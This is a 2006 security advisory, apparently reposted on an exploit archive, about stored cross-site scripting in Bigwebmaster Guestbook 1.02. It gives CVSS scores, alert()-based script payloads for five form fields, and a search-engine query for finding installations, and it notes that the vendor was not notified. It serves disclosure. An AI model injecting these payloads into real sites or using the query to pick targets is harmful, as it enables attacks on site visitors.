bigwebmaster guestbook multiply XSS

2006.05.08
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Affected software: Bigwebmaster Guestbook version 1.02 and down Vendor: http://www.bigwebmaster.com/Perl/Scripts_and_Programs/Guestbooks/ Introduction: (taken from vendor site) This is one of the most powerful guestbooks that you will find on the internet. Visitors who come to your site will be able to leave comments and other general information about themselves. If you want to know what your visitors are thinking, and if you want a fully customizable script, this one is perfect for you. Features include template files to fit any website design, 9 standard fields, 9 extra fields (customizable), unlimited entries, and easy to use admin area. Full online demo available. Vulnerability Details: when adding a comment addguest.cgi accepts javascript code into mail,site,city,state and country fields which lead to javascript cross site scripting when viewguest.cgi is accessed for displaying the content of the guest book. POC: http://www.example.com/gb/addguest.cgi name: xss mail: xss (at) example (dot) com [email concealed] <script>alert('XSS in mail');</script> site: http://www.example.com/ <script>alert('XSS in site');</script> city: <script>alert('XSS in city');</script> state: <script>alert('XSS in state');</script> country: <script>alert('XSS in country');</script> google search: intitle:Big Webmaster Guestbook Vendor Status: NOT NOTIFIED Solution: I DON'T CARE Javor Ninov aka DrFrancky http://www.securitydot.net/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (MingW32) iD8DBQFEWiWDck4kcwaj+YIRApunAJ0Vz6d/OEVQNfuiyy3gVa7GwmyuVgCeOAs2 nHeXxQltIZL+kt8vgdOtCIM= =HZqy -----END PGP SIGNATURE-----


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top